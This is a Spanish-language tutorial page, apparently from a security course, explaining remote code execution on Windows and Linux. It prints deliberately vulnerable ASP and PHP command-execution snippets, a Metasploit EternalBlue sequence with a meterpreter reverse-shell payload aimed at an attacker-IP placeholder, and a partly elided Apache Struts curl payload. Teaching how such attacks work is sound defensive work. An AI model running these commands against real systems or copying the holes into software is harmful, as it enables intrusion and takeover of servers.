Comprar curso YouTube Twitter LinkedIn

RCE (Remote Code Execution)

La Ejecución Remota de Código (RCE, por sus siglas en inglés) es una vulnerabilidad crítica que permite a un atacante ejecutar comandos arbitrarios o código en una máquina remota. Esta vulnerabilidad puede surgir debido a errores de programación, malas configuraciones de seguridad, o la explotación de funciones mal implementadas en el software. RCE es una de las vulnerabilidades más peligrosas porque puede llevar al compromiso total del sistema afectado.

¿Cómo Funciona RCE?

RCE ocurre cuando un atacante puede enviar datos a una aplicación vulnerable y lograr que esos datos se interpreten como código ejecutable. Esto puede ser a través de diversas vías como aplicaciones web, servicios de red, aplicaciones de escritorio, etc.

RCE en Windows

Métodos Comunes de Explotación

  1. Inyección de Comandos en Aplicaciones Web: Las aplicaciones web mal configuradas o que no sanitizan correctamente las entradas del usuario pueden ser vulnerables a la inyección de comandos. Por ejemplo, si una aplicación pasa parámetros directamente a la línea de comandos sin validación adecuada.

    Ejemplo:

    <%
Dim cmd
cmd = Request("cmd")
Set shell = Server.CreateObject("WScript.Shell")
shell.Run cmd
%>

    Si el usuario accede a http://victima.com/page.asp?cmd=calc.exe, esto ejecutará calc.exe en el servidor.

  2. Vulnerabilidades en Servicios de Red: Los servicios de red como SMB, RDP, y otros pueden tener vulnerabilidades que permiten la ejecución remota de código. Un ejemplo famoso es la vulnerabilidad EternalBlue que explotó el protocolo SMBv1.

  3. Exploit de Binarios: Los binarios vulnerables, especialmente aquellos con permisos elevados, pueden ser explotados para ejecutar código arbitrario. Esto puede incluir aplicaciones que procesan archivos de entrada o que interactúan con otras aplicaciones sin las debidas restricciones de seguridad.

Ejemplo Práctico: EternalBlue

EternalBlue explotó una vulnerabilidad en SMBv1 para ejecutar código arbitrario en máquinas Windows. Utilizando herramientas como Metasploit, un atacante podría ejecutar el siguiente módulo para explotar esta vulnerabilidad:

Comandos de Metasploit:

use exploit/windows/smb/ms17_010_eternalblue
set RHOST <IP de la víctima>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <IP del atacante>
exploit

RCE en Linux

Métodos Comunes de Explotación

  1. Inyección de Comandos en Aplicaciones Web: Similar a Windows, las aplicaciones web en Linux pueden ser vulnerables a la inyección de comandos si no sanitizan correctamente las entradas del usuario.

    Ejemplo:

    <?php
$cmd = $_GET['cmd'];
system($cmd);
?>

    Accediendo a http://victima.com/page.php?cmd=ls, esto ejecutará el comando ls en el servidor.

  2. Servicios de Red: Servicios como SSH, FTP, y otros pueden ser explotados si tienen vulnerabilidades que permiten la ejecución remota de código. Por ejemplo, la vulnerabilidad en Apache Struts que permitía la ejecución de comandos arbitrarios a través de peticiones HTTP.

  3. Explotación de Binarios Setuid: Binarios con el bit setuid activado pueden ser explotados para obtener privilegios elevados y ejecutar código arbitrario. Un ejemplo clásico es la explotación de binarios que no manejan correctamente la entrada del usuario.

Ejemplo Práctico: Apache Struts

La vulnerabilidad en Apache Struts permitió a los atacantes ejecutar comandos arbitrarios enviando peticiones HTTP maliciosas.

Comando de Explotación:

curl -v -X POST -H "Content-Type: application/xml" --data "<?xml version=\"1.0\" encoding=\"UTF-8\"?><map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><value class=\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\"><_bytecodes><byte-array>...</byte-array></_bytecodes><_name>...</_name><_class>...</_class><_tfactory>...</_tfactory></value></entry><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><value class=\"java.lang.String\">calc</value></jdk.nashorn.internal.objects.NativeString></entry></map>" http://victima.com/struts2-showcase/employee/save

Este comando puede iniciar la calculadora en la máquina víctima si el servidor Apache Struts es vulnerable.

AnteriorCommon Vulnerabilities and Exposures - [CVE]SiguienteBuffer Overflow

Última actualización